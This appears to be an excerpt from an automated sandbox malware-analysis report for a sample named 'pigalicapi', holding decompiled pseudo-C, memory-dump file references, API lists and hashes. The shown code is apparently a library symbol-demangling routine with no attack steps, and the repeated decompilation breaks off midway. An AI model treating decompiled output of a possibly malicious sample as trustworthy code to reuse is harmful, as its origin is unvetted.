                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				char _v320;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				char _v328;
                                                                                                                                                                                                                                                                                                        				char _v332;
                                                                                                                                                                                                                                                                                                        				signed int _v336;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char* _v344;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v348;
                                                                                                                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                                                                                                                        				char* _v356;
                                                                                                                                                                                                                                                                                                        				signed char* _v360;
                                                                                                                                                                                                                                                                                                        				signed char _v364;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v368;
                                                                                                                                                                                                                                                                                                        				char _v372;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v384;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v388;
                                                                                                                                                                                                                                                                                                        				signed int _v392;
                                                                                                                                                                                                                                                                                                        				char _v400;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v404;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t124;
                                                                                                                                                                                                                                                                                                        				int _t125;
                                                                                                                                                                                                                                                                                                        				signed int _t128;
                                                                                                                                                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                                                                                                                                                        				signed char* _t130;
                                                                                                                                                                                                                                                                                                        				char* _t131;
                                                                                                                                                                                                                                                                                                        				signed char* _t135;
                                                                                                                                                                                                                                                                                                        				signed char* _t136;
                                                                                                                                                                                                                                                                                                        				signed int _t140;
                                                                                                                                                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                                                                                                                                                        				void* _t144;
                                                                                                                                                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                                                                                                                                                        				signed int _t147;
                                                                                                                                                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                                                                                                                                                        				signed char* _t162;
                                                                                                                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                                                                                                                        				signed char* _t165;
                                                                                                                                                                                                                                                                                                        				void* _t169;
                                                                                                                                                                                                                                                                                                        				void* _t170;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t171;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t173;
                                                                                                                                                                                                                                                                                                        				void* _t175;
                                                                                                                                                                                                                                                                                                        				void* _t183;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t88 = __eax;
                                                                                                                                                                                                                                                                                                        				_t130 = __eax;
                                                                                                                                                                                                                                                                                                        				_t171 = _t170 - 0x18c;
                                                                                                                                                                                                                                                                                                        				_v384 = __edx;
                                                                                                                                                                                                                                                                                                        				_t147 =  *__eax & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				_v388 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t175 = _t147 - 0x5f;
                                                                                                                                                                                                                                                                                                        				if(_t175 == 0) {
                                                                                                                                                                                                                                                                                                        					_t163 = 1;
                                                                                                                                                                                                                                                                                                        					if( *((char*)(__eax + 1)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        						goto L1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                                                                                                        					 *_t171 = _t130;
                                                                                                                                                                                                                                                                                                        					_v392 = _t147;
                                                                                                                                                                                                                                                                                                        					_t90 = strlen(??);
                                                                                                                                                                                                                                                                                                        					_v372 = _t130;
                                                                                                                                                                                                                                                                                                        					_v364 = 0x11;
                                                                                                                                                                                                                                                                                                        					_v360 = _t130;
                                                                                                                                                                                                                                                                                                        					_v352 = 0;
                                                                                                                                                                                                                                                                                                        					_v340 = 0;
                                                                                                                                                                                                                                                                                                        					_t141 = _t90;
                                                                                                                                                                                                                                                                                                        					_v368 = _t130 + _t90;
                                                                                                                                                                                                                                                                                                        					_v348 = _t141 + _t141;
                                                                                                                                                                                                                                                                                                        					_v336 = _t141;
                                                                                                                                                                                                                                                                                                        					_v332 = 0;
                                                                                                                                                                                                                                                                                                        					_v328 = 0;
                                                                                                                                                                                                                                                                                                        					_v324 = 0;
                                                                                                                                                                                                                                                                                                        					_t96 = E0040DB20(0x00000012 + (_t141 + _t141 + _t141 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        					_t99 = E0040DB20(0x00000012 + _t141 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        					_t148 = _v392;
                                                                                                                                                                                                                                                                                                        					_t173 = _t171 - _t96 - _t99;
                                                                                                                                                                                                                                                                                                        					_t183 = _t163 - 1;
                                                                                                                                                                                                                                                                                                        					_v356 =  &_v400;
                                                                                                                                                                                                                                                                                                        					_v344 =  &_v400;
                                                                                                                                                                                                                                                                                                        					if(_t183 == 0) {
                                                                                                                                                                                                                                                                                                        						_t142 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t148 == 0x5f) {
                                                                                                                                                                                                                                                                                                        							_t148 =  *(_t130 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							_v360 = _t130 + 1;
                                                                                                                                                                                                                                                                                                        							if(_t148 != 0x5a) {
                                                                                                                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v360 = _t130 + 2;
                                                                                                                                                                                                                                                                                                        							_t133 =  &_v372;
                                                                                                                                                                                                                                                                                                        							_t142 = E00406810( &_v372, 1);
                                                                                                                                                                                                                                                                                                        							if((_v364 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_t165 = _v360;
                                                                                                                                                                                                                                                                                                        									_t148 =  *_t165 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									if(_t148 != 0x2e) {
                                                                                                                                                                                                                                                                                                        										goto L20;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_t112 = _t165[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									_t85 = _t112 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        									if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        										_t142 = E00405190(_t133, _t142);
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t148 =  *_t165 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										goto L20;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t148 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t183 < 0 || _t163 > 3) {
                                                                                                                                                                                                                                                                                                        							_t142 = E00405ED0( &_v372);
                                                                                                                                                                                                                                                                                                        							_t148 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t162 = _t130 + 0xb;
                                                                                                                                                                                                                                                                                                        							_v360 = _t162;
                                                                                                                                                                                                                                                                                                        							if( *((char*)(_t130 + 0xb)) != 0x5f ||  *((char*)(_t130 + 0xc)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        								 *_t173 = _t162;
                                                                                                                                                                                                                                                                                                        								_t134 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t144 = E00404FF0( &_v372, strlen(??), _t162);
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v360 = _t130 + 0xd;
                                                                                                                                                                                                                                                                                                        								_t134 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t144 = E00406810( &_v372, 0);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t173 = 0;
                                                                                                                                                                                                                                                                                                        							_t124 = E00404F90(_t134, _t144, (0 | _t163 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        							_t135 = _v360;
                                                                                                                                                                                                                                                                                                        							 *_t173 = _t135;
                                                                                                                                                                                                                                                                                                        							_v392 = _t124;
                                                                                                                                                                                                                                                                                                        							_t125 = strlen(??);
                                                                                                                                                                                                                                                                                                        							_t142 = _v392;
                                                                                                                                                                                                                                                                                                        							_t136 = _t135 + _t125;
                                                                                                                                                                                                                                                                                                        							_v360 = _t136;
                                                                                                                                                                                                                                                                                                        							_t148 =  *_t136 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L20:
                                                                                                                                                                                                                                                                                                        						_t102 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t148 == 0 && _t142 != 0) {
                                                                                                                                                                                                                                                                                                        							_t131 =  &_v320;
                                                                                                                                                                                                                                                                                                        							_v64 = 0;
                                                                                                                                                                                                                                                                                                        							_v60 = 0;
                                                                                                                                                                                                                                                                                                        							_v48 = 0;
                                                                                                                                                                                                                                                                                                        							_v56 = _v384;
                                                                                                                                                                                                                                                                                                        							_v44 = 0;
                                                                                                                                                                                                                                                                                                        							_v36 = 0;
                                                                                                                                                                                                                                                                                                        							_v32 = 0;
                                                                                                                                                                                                                                                                                                        							_v52 = _v388;
                                                                                                                                                                                                                                                                                                        							_v40 = 0;
                                                                                                                                                                                                                                                                                                        							E004079F0(_t131, _t142, 0x11);
                                                                                                                                                                                                                                                                                                        							_t107 = _v64;
                                                                                                                                                                                                                                                                                                        							 *_t173 = _t131;
                                                                                                                                                                                                                                                                                                        							 *((char*)(_t169 + _t107 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        							_v404 = _v52;
                                                                                                                                                                                                                                                                                                        							_v408 = _t107;
                                                                                                                                                                                                                                                                                                        							_v56();
                                                                                                                                                                                                                                                                                                        							_t102 = 0 | _v40 == 0x00000000;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return _t102;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L1:
                                                                                                                                                                                                                                                                                                        				asm("repe cmpsb");
                                                                                                                                                                                                                                                                                                        				_t140 = 0 | _t175 > 0x00000000;
                                                                                                                                                                                                                                                                                                        				_t163 = 0;
                                                                                                                                                                                                                                                                                                        				if(_t140 != (_t88 & 0xffffff00 | _t175 > 0x00000000)) {
                                                                                                                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t128 =  *(_t130 + 8) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				if(_t128 == 0x2e || _t128 == 0x5f) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_t129 =  *(_t130 + 9) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					_t10 = _t129 == 0x49;
                                                                                                                                                                                                                                                                                                        					_t145 = _t140 & 0xffffff00 | _t10;
                                                                                                                                                                                                                                                                                                        					if(_t10 == 0) {
                                                                                                                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                                                                                                                        						_t163 = 0;
                                                                                                                                                                                                                                                                                                        						if( *((char*)(_t130 + 0xa)) == 0x5f) {
                                                                                                                                                                                                                                                                                                        							_t163 = (_t145 << 0x1f >> 0x1f) + 3;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t163 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t129 != 0x44) {
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t128 != 0x24) {
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
































































                                                                                                                                                                                                                                                                                                        0x0040c550
                                                                                                                                                                                                                                                                                                        0x0040c556
                                                                                                                                                                                                                                                                                                        0x0040c558
                                                                                                                                                                                                                                                                                                        0x0040c55e
                                                                                                                                                                                                                                                                                                        0x0040c564
                                                                                                                                                                                                                                                                                                        0x0040c567
                                                                                                                                                                                                                                                                                                        0x0040c56d
                                                                                                                                                                                                                                                                                                        0x0040c570
                                                                                                                                                                                                                                                                                                        0x0040c714
                                                                                                                                                                                                                                                                                                        0x0040c719
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c63d
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c576
                                                                                                                                                                                                                                                                                                        0x0040c582
                                                                                                                                                                                                                                                                                                        0x0040c584
                                                                                                                                                                                                                                                                                                        0x0040c58a
                                                                                                                                                                                                                                                                                                        0x0040c58e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c590
                                                                                                                                                                                                                                                                                                        0x0040c596
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c700
                                                                                                                                                                                                                                                                                                        0x0040c702
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c708

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_$_$_GLOBAL_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-4292778781
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: c40dabd319674bd2cc0e0cae16437056d9595a4bb6a0433c78e95727e65cb020
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C815D75D04269CBDB20DF29C8C43DABBF1AB45304F4482BAD449BB382D7399E858F95
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 100014DB
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 10001507
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                                                        • Instruction ID: 25e538b33cc42fa1af6dbc26f5ecb21efd633c51d41fb312bc782d6f26faee88
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1871F874E04109EFEB08DF94C990AAEB7B2FF48345F248598E915AB345D735EE81CB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                                        			E0040C545(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				char _v320;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				char _v328;
                                                                                                                                                                                                                                                                                                        				char _v332;
                                                                                                                                                                                                                                                                                                        				signed int _v336;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char* _v344;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v348;
                                                                                                                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                                                                                                                        				char* _v356;
                                                                                                                                                                                                                                                                                                        				signed char* _v360;
                                                                                                                                                                                                                                                                                                        				signed char _v364;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v368;
                                                                                                                                                                                                                                                                                                        				char _v372;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v384;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v388;
                                                                                                                                                                                                                                                                                                        				signed int _v392;
                                                                                                                                                                                                                                                                                                        				char _v400;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v404;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t124;
                                                                                                                                                                                                                                                                                                        				int _t125;
                                                                                                                                                                                                                                                                                                        				signed int _t128;
                                                                                                                                                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                                                                                                                                                        				signed char* _t131;
                                                                                                                                                                                                                                                                                                        				char* _t133;
                                                                                                                                                                                                                                                                                                        				signed char* _t137;
                                                                                                                                                                                                                                                                                                        				signed char* _t138;
                                                                                                                                                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                                                                                                                        				signed int _t147;
                                                                                                                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                                                                                                                        				signed int _t150;
                                                                                                                                                                                                                                                                                                        				signed char* _t166;
                                                                                                                                                                                                                                                                                                        				void* _t168;
                                                                                                                                                                                                                                                                                                        				signed char* _t171;
                                                                                                                                                                                                                                                                                                        				void* _t176;
                                                                                                                                                                                                                                                                                                        				void* _t178;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t179;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t181;
                                                                                                                                                                                                                                                                                                        				void* _t183;
                                                                                                                                                                                                                                                                                                        				void* _t191;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t88 = __eax;
                                                                                                                                                                                                                                                                                                        				_t176 = _t178;
                                                                                                                                                                                                                                                                                                        				_t131 = __eax;
                                                                                                                                                                                                                                                                                                        				_t179 = _t178 - 0x18c;
                                                                                                                                                                                                                                                                                                        				_v384 = __edx;
                                                                                                                                                                                                                                                                                                        				_t149 =  *__eax & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				_v388 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t183 = _t149 - 0x5f;
                                                                                                                                                                                                                                                                                                        				if(_t183 == 0) {
                                                                                                                                                                                                                                                                                                        					_t168 = 1;
